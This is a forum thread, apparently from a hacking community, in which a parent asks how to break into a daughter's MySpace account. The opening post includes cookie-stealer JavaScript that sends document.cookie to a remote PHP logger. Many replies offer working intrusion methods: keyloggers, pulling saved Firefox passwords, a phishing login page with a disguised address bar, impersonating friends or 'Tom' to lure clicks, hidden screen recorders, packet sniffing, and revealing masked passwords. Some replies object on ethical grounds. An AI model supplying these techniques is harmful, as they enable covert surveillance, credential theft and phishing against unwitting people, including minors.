I suspect my daughter has been communicating with someone online through her Myspace page and I want to get into it to see if I'm right. She's a smart girl though (better at computers than I am obviously).

In doing some research, I came across a cookie stealer. Now, I'm not a complete bonehead when it comes to computers, I understand the concept of cookies and I understood the tutorial on how to hack into a persons Myspace page.

Where I'm lost is in coding a cookie stealer. I've got a host that accepts php (which I don't understand), I've set up a bogus Myspace page that I can use to switch the MYUSERINFO. But from I've gathered Myspace doesn't accept javascript.

Normally I wouldn't have a problem taking the time to learn this myself, in fact I've started doing the challenges and reading the tutorials to gain some knowledge. However, obviously, I'm also impatient.

I really need some help with this. I'm really sorry if this is long-winded and WAY more info than you need to know. Is there someone who can break the coding down for me and REALLY explain it, line-for-line?

<script language="JavaScript">
document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;
</script>

<a href="javascript:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>

or is there an easier, more user-friendly (as in doesn't completely know what they're doing) way of getting into her page?

Thanks in advance for any help you might be able to give me.

If you're just trying to see what she types in, why not just use a keylogger? That would record every keystroke she makes.

And if you want to view her myspace but it's on private, get a picture of one of her friends on her top 8, make a new myspace with basically all the same details as this friend, then upload that picture. Send her a friend request and she'll see the picture of her friend and think her friend just made a new myspace account for some reason and she'll probably automatically add you. Then you could see everything on her profile, including who leaves her comments and whatnot. Wink

Good Luck!

if your using firefox, which you should be, getting her password is simple. im assuming that since your her father, you have access to her computer. in firefox, go to tools>options>security>show passwords and bam, you get her myspace password. much simpler for a beginner than cookie stealing. if you need any more help, feel free to contact me

not be be the "typical-hacker", but I want to play devil's advocate here. You suspect she is communicating with someone online...someone bad? or just someone? what is the problem with her doing this....?

Also ,all the things posted above are legal, since she is your daughter, but it is unethical. if she is, as you say, a smart girl...why not trust her? or talk to her?

just playing devil's advocate here....if you want another good way to do this...use a screenrecorder that can be hidden...personally i like em better than a keylogger.

if i were you, personally, i would stay away from keyloggers. from your post, i can tell that your obviously not the best programmer, so coding one your self is defenatly out. many public use ones have shit loads of back doors and viruses. go with viewing your ff saved passwords

you could also set up a fake myspace page where the only difference from the real myspace page is that the username/password information is actually sent to your website that just logs the info and then redirects the user to the real myspace page or something....(basically, phishing). only problem is you would have to make sure she doesnt notice the fact that the url in the url bar is different.... this idea could take a while if you dont really know what you are doing. i'd say keylogger is easier, but i was just throwing another idea out there

Check out KeyGhost.

It might do what you want.

Honestly though, Only_Samurai is right. You should seriously consider
just talking with your daughter. If you are straight forward and honest
with your daughter, there's a better chance she will be that way with you.
Besides, if that doesn't work you could still resort to spying.
Good luck.

if he just needs to login with her stuff then he could just go to myspace.com and it would automatically fill out the username / password am i right? therefore he doesn't need to know what the password is... but then again if its not saved then that idea does no good what so ever.

someone was talking about making a fake login, but she might notice the fake URL. well what you can do is, in the address bar, clear the url, and type in http://www.myspace.com however do not hit enter, therefore; it looks like the page is at myspace.com even more, though it is not.

as to what samurai said, that is very true. if she is a "smart girl" then she will probably tell the truth, unless she is smart in a sense to not tell you the truth, or you meant that she was computer smart.

theres my 2 cents. Grin

okay....still going with my first post as to not doing this because i think its horribly unethical, but if you really must and her password is saved....
goto the page...the ***** should fill the password box, and use a bit of jscript injection to view the real password...done.

really tho, spying should be a last resort if any. my parents tried this on me and only made me talk even less...now that they have changed to respecting me i let them know alot more. really, its just better for your relationship with her.....and karma.

ok lol this is my kinda post...this is what i do all the time at school...ok here is a few simple solutions...well as stated previously the firefox password is useless becyz if she had the password saved then u could simply go to the site and type in her username =P My high recommendation would be to make a fake login...or i can make u one it only takes me like 30 seconds lol and then from there u can do what we do at school all the time (as someone alrdy suggested) type it in the url bar as www.myspace.com but dont press enter...leave that on the screen and when your girly comes to myspace most likely she will simply login and bam her email and password get sent to your email address...its simple and easy to do. You can contact me at [email protected] if u would like me to help making the fake login...i can even host it for ya =P Just remember everyone deserves a little privacy, so i would recommend talking to your daughter first and then if you are still suspicious we can handle it lol. Also another option that me and my friends do is make a bullshit myspace account and make our display name Tom and steal his pic lol...then send her a message saying to look at your profile cuz u updated it or sumn...then make all the links on your profile point to the fake login..that way when she clicks home etc it will take her to the fake login...there are many other ways, these are jus some of my favs. =) Pce

well likely she probably could also be communicating to him through msn as myspace is a bit of a pain in the ass to communicate through so open up msn messnger (if she uses it offcourse) and usually its set to remember password and address, log in, go into preferances and tick the option to save all conversations (which will save it in a log file or a txt file etc) which you can read later to see if she has been talking to anyone suspicious,

only_samurai is right.
If she ever caught on she would then believe that you did not trust her and then you end up in an argument and it would be likely you would jepordise the relationship you had before with her, as said before just talk to her and find out who she has been talking too, most girls over the age of 10 have a reasonable brain to realise not to talk to strangers on the street or the internet so it would probably be one of her friends.

one thing you could do...i hate giving ideas on what to do like this, but it is your choice...so i'll let you make it.

a packet sniffer. etherdetect is what i use. if she's on a router with you, you can actually see the html code for all http connections and it solves the msn, aim, yahoo problem. (if she's using skype...no dice. 256 bit encryption rocks)...
again see previous posts for morality issues....this is the way id go if i were you....and you decide not to TALK to YOUR daughter.... sorry

i found that even if passwords arent saved, FF will still have them show up. not sure why this happens, but a few weeks ago a friend of mine was at my house and logged in to his facebook. i checked saved passwords, completely unrelated, wasnt looking for his stuff, but there it was. username and password. maybe even if it wasnt saved, it will still be there.

I can't believe I'm reading this. I haven't posted in a long time, and I didn't intend to do anything but sit behind my box and watch. But this is just too much.

You guys say you realize this is wrong, but still give him the info on how to overtake a myspace? It's absolutely hypocritcal! "It's wrong but you can have a sploit anyways". Come on, I'm feeling like this place is getting to be more skiddie-fied.

As for the poster, be a parent and talk to the kid. It makes me sick you came to a hacking environment to try to control the life of your kid.

Nicely put. Trust is hard to gain but easy to lose, I don't advise risking that. (I found a keylogger on my computer and now I refuse to talk to my parents most days *partially because they don't believe a damn thing I've said anyway*) As if hacking your kid is going to get you anywhere... Read a parenting book or something.

Thanks guys for all of the help. I completely understand the ethical issues involved with this and I'm struggling with them as well.

(BTW: I'm her mother) Her father and I have been going through a really bad divorce, which is when she started to spend a lot of time on Myspace. I have tried talking to her, but with things as tense as they are, either I'm not explaining myself well, or we're just not getting each other.

I don't think it's one of her friends. I know most of her friends, and usually they're all really good kids. It's just some of the things she says and does (or doesn't do) that are making me suspect that it's something worse.

Of course, that could just be me being paranoid.

Anyway, like I said, thanks for all of your help and suggestions.

Again, hacking your kids won't solve anything. The way I see it, things could only get worse. If you got divorced, it could be depression due to that, or something of the sort. If I were you, I'd wait a while and see how things go. I don't at all advise you spy on her though.
